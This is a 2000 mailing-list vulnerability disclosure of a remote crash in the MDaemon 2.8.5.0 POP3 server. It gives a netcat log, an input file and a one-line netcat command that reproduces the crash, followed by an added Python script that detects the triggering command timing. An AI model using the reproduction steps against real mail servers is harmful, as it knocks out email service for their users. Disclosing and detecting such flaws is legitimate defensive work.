Vulnerability Development mailing list archives
mdaemon 2.8.5.0 DoS
From: Craig () FREENET DE (Craig)
Date: Fri, 9 Jun 2000 18:11:36 +0200
mdaemon 2.8.5.0 remote DoS

Win95 vulnerable (Tested on a K5-166 with 32MB RAM)
Win98SE vulnerable (Tested on a K7-500 with 128MB RAM)

A single user wasn't able to receive eMail - after the password was sent, the mail client just halted, and did nothing till the timeout. I tried to find the error by using netcat to enter the commands on my own and find out what's wrong. Playing around, something strange happened:

--------------------LOG-START-----------------------
netcat 192.168.0.3 110
+OK Server1 POP service ready using UNREGISTERED SOFTWARE [1] MDaemon v2.8.5.0 T
User User1
+OK User1... Recipient ok
pass yaddayadda
{ENTER}
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK .
quit
+OK User1 Server1 POP Server signing off (mailbox empty)
--------------------LOG-END-----------------------------------------

MDaemon crashed after leaving, showing 2 popups.

If you try to verify this, write an input file:

-----inputfile--------------
User User1
pass yaddayadda
{just press ENTER}
uidl
quit
quit
-----eof--------------------

then:

netcat [Server_to_test] 110 <inputfile

You need to send the commands fast! The more messages you send, the more time you have to crash the server; you need to send all the commands before the status of the mailbox is shown ("+OK User1's mailbox has 3600 total messages (1018800 octets)."). When you see that message, it is too late...

If there are too many files in a user's directory (e.g. "\mdaemon\users\User1") the server needs a long time to read them (for the report - uidl), and the clients get timeouts because it takes a long time. Some people who were mailbombed could have the problem of not being able to receive their messages and could think their account was deleted or the password was changed.

Craig
-Craig () Freenet De-

P.S.: English is not my mother language...
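
Added example, not part of the original post: a Python check over POP3 session events that flags clients which keep sending lines after PASS before the server has answered, the timing condition the post describes. The event tuple format, the function name and the sample sessions are assumptions constructed for illustration.

```python
# Added example: flag POP3 sessions where the client keeps sending commands
# while the server has not yet answered PASS (mailbox still being read).
from collections import defaultdict

# Constructed sample events: (session id, direction, line).
# "C" = client to server, "S" = server to client. Not taken from a real log.
SAMPLE_EVENTS = [
    ("s1", "S", "+OK POP service ready"),
    ("s1", "C", "USER User1"),
    ("s1", "S", "+OK User1... Recipient ok"),
    ("s1", "C", "PASS ********"),
    ("s1", "S", "+OK User1's mailbox has 2 total messages (640 octets)."),
    ("s1", "C", "UIDL"),
    ("s1", "S", "+OK"),
    ("s1", "C", "QUIT"),
    ("s2", "S", "+OK POP service ready"),
    ("s2", "C", "USER User1"),
    ("s2", "S", "+OK User1... Recipient ok"),
    ("s2", "C", "PASS ********"),
    ("s2", "C", ""),
    ("s2", "C", "UIDL"),
    ("s2", "C", "QUIT"),
    ("s2", "S", "-ERR that command is valid only in the AUTHORIZATION state!"),
]


def commands_sent_before_pass_reply(events):
    """Return {session: [lines sent while PASS was unanswered]}."""
    awaiting_pass_reply = defaultdict(bool)
    early = defaultdict(list)
    for session, direction, line in events:
        if direction == "S":
            # Any server status line ends the wait for the PASS reply.
            if line.startswith(("+OK", "-ERR")):
                awaiting_pass_reply[session] = False
            continue
        if awaiting_pass_reply[session]:
            early[session].append(line)
        elif line.split(" ", 1)[0].upper() == "PASS":
            awaiting_pass_reply[session] = True
    return dict(early)


if __name__ == "__main__":
    for session, lines in commands_sent_before_pass_reply(SAMPLE_EVENTS).items():
        print(f"{session}: {len(lines)} line(s) sent before the PASS reply: {lines}")
```

A session that waits for each reply, like `s1`, is not reported; only `s2`, which sends three lines while PASS is still unanswered, is flagged.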